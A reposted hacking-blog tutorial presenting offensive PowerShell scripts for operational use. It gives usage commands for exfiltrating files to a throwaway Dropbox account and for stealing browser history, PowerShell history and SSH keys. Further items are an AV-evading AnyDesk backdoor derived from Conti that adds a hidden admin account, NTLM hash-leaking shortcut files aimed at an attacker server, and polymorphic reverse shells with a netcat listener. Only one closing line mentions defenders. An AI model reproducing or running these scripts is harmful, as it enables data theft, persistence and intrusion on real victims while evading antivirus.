National Cyber Warfare Foundation (NCWF)

PowerShell for Hackers, Part 4: Operational Scripts
0 user ratings		2025-08-15 13:32:13
milo
Red Team (CNA)

Welcome back, aspiring cyberwarriors! Now that you know the basics, we’re ready to start writing our own scripts. There will be times when off-the-shelf tools won’t do exactly what you need, or when certain repetitive tasks begin to eat up time and attention. That’s when you’ll need to start developing your own scripts that are […]


The post PowerShell for Hackers, Part 4: Operational Scripts first appeared on Hackers Arise.







Welcome back, aspiring cyberwarriors!





Now that you know the basics, we’re ready to start writing our own scripts. There will be times when off-the-shelf tools won’t do exactly what you need, or when certain repetitive tasks begin to eat up time and attention. That’s when you’ll need to start developing your own scripts that are tailored and efficient without unnecessary overhead. PowerShell is flexible and lets you get things done fast. Below are several scripts we’ve put together for this module and each one comes with a README file to help you get started. We encourage you to test, tweak, and build on them to fit your own workflows.





File Exfiltration to Dropbox





Repo:





https://github.com/soupbone89/Scripts/tree/main/DropBox%20Exfiltration





When you can’t use RDP or Mega, it helps to have a quick way to push files out. This PowerShell script uploads files to Dropbox with minimal fuss. We adapted it from I‑Am‑Jacoby’s original to handle non‑English filenames. Any file with a foreign name gets copied into C:\Users\Public\Documents under a random filename, uploaded, then deleted locally.

















Setup:





1. Create a new Dropbox account with a throwaway email.





2. Generate an access token in Dropbox’s developer console.





3. Add the access token to the script





Usage:





PS > . .\dropbox.ps1 





PS > “file.txt” | DropBox-Upload 





Browser History & Bookmarks Exfiltration





Repo:





https://github.com/soupbone89/Scripts/tree/main/Browser%20Data%20Extraction





Browser history and bookmarks reveal where users go and what they store. This script pulls data from Chrome or Edge so you can see saved sites, login pages, and more.

















Usage:





PS > . .\browser.ps1 





PS > Get-BrowserData -Browser chrome -DataType history 





or 





PS > Get-BrowserData -Browser edge -DataType bookmarks 





PowerShell Command History Exfiltration





Repo:





https://github.com/soupbone89/Scripts/tree/main/PowerShell%20History%20Extractor





Your PowerShell history can contain commands, credentials, or network paths. This script gathers each user’s ConsoleHost_history.txt and saves it for inspection.





















You can also run this one‑liner to preview output on the console:





PS > Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { $u=$_.FullName.Split(‘\’)[2]; Write-Host “`n=== History for user: $u ===”; Get-Content $_.FullName }

















Usage:





PS > .\history.ps1 





AnyDesk Checker





Repo:





https://github.com/soupbone89/Scripts/tree/main/AnyDesk%20Check





AnyDesk often goes unnoticed on corporate hosts. This script scans a list of FQDNs to see which machines already have AnyDesk installed before you push a new install. It runs as SYSTEM via PsExec, so it doesn’t drop user folders or trigger alerts.

















Requirements:





1. hosts.txt (one FQDN per line)





2. Domain admin credentials





3. PsExec64.exe in the same folder





Usage





PS > .\anydesk.ps1 





Once you find a host with AnyDesk:





PS > cmd.exe /c “C:\Program Files (x86)\AnyDesk\AnyDesk.exe” –get-id 





PS > & ‘C:\Program Files (x86)\AnyDesk\AnyDesk.exe’ –set-password P@ssw0rd 





AnyDesk Backdoor





Repo:





https://github.com/soupbone89/Scripts/tree/main/AnyDesk-Backdoor





If no hosts have AnyDesk, you can install it yourself on a low‑traffic machine. This script downloads and installs AnyDesk, then adds a local admin (oldadministrator:P@ssw0rd125@). It’s based on a known Conti variant with renamed variables to bypass AV.

















Usage:





1. Land on the target host.





2. Run: .\anydesk_backdoor.ps1





Kaspersky Checker





Repo:





https://github.com/soupbone89/Scripts/tree/main/Kaspersky%20Check





Similar to the AnyDesk checker, this script detects which hosts have Kaspersky installed. Good for mapping out where AV is present so you can plan your pivots and persistence.

















Requirements:





Same as AnyDesk checker.





Usage:





PS > .\kaspersky.ps1 





SMB Hash Leak





Repo:





https://github.com/soupbone89/Scripts/tree/main/SMB%20Hash%20Leak





This script crafts .lnk shortcuts pointing to a non‑existent SMB share. When users open or preview the link, their machine sends an NTLM hash to your server. You capture it with Responder or Inveigh and crack it offline.

















Pick filenames that fit into existing shares to avoid suspicion.





Usage:





PS > . .\leak.ps1





PS > Create-SMBHashLeakLnk -LnkFilePath “.\grab.lnk”  -SmbSharePath “\\192.168.254.43\share\file.exe”  -Description “Please wait…”





SSH Key Exfiltration





Repo:





https://github.com/soupbone89/Scripts/tree/main/SSH%20Key%20Extraction





This script exfiltrates SSH keys from their default locations and encodes all the collected data in base64. If needed, you can also specify a custom directory where the keys are stored.

















To read the extracted data, simply decode the base64 output.





Usage:





PS > . .\ssh.ps1





PS > $data = Get-Ssh





Or specify a custom directory where the keys are stored:





PS > $data = Get-Ssh -sshKeyDirectoryPath “C:\Custom\Path\To\.ssh





Decode the loot:





PS > [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($data))





Bonus: AV-evasive Reverse Shells





As a small bonus, we want to share a useful tool created by I-Am-Jakoby that lets you generate AV-evasive PowerShell reverse shells. These shells are polymorphic, meaning each one is slightly different every time you generate it. As of now, most antivirus engines, including Defender,  still haven’t caught on, which makes this the perfect time to use them to your advantage.





To get started, head over to:





https://powershellforhackers.com/tools/revshell The interface is straightforward. Just enter the IP address and port of your C2 server where your listener is running. The tool will generate a custom reverse shell for you.

















Copy and paste the shell into your terminal. If Defender is active, you’ll notice it doesn’t flag anything.

















Make sure your listener is already up and running before you execute the shell.





c2 > nc -lvnp 9001

















Once that’s done – we have a connection.





Summary





PowerShell is a versatile tool for automating tasks and building custom offensive scripts. Whether you’re automating large data pulls, scanning for remote‑access tools, or harvesting credentials, these examples show you how to get started. Defenders can also use this knowledge to spot and block these techniques in their own environments.









Look for our upcoming Powershell for Hackers training in 2026!

The post PowerShell for Hackers, Part 4: Operational Scripts first appeared on Hackers Arise.



Source: HackersArise
Source Link: https://hackers-arise.com/powershell-for-hackers-part-4-operational-scripts/

Comments
new comment
Nobody has commented yet. Will you be the first?
  
Forum
Red Team (CNA)


Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.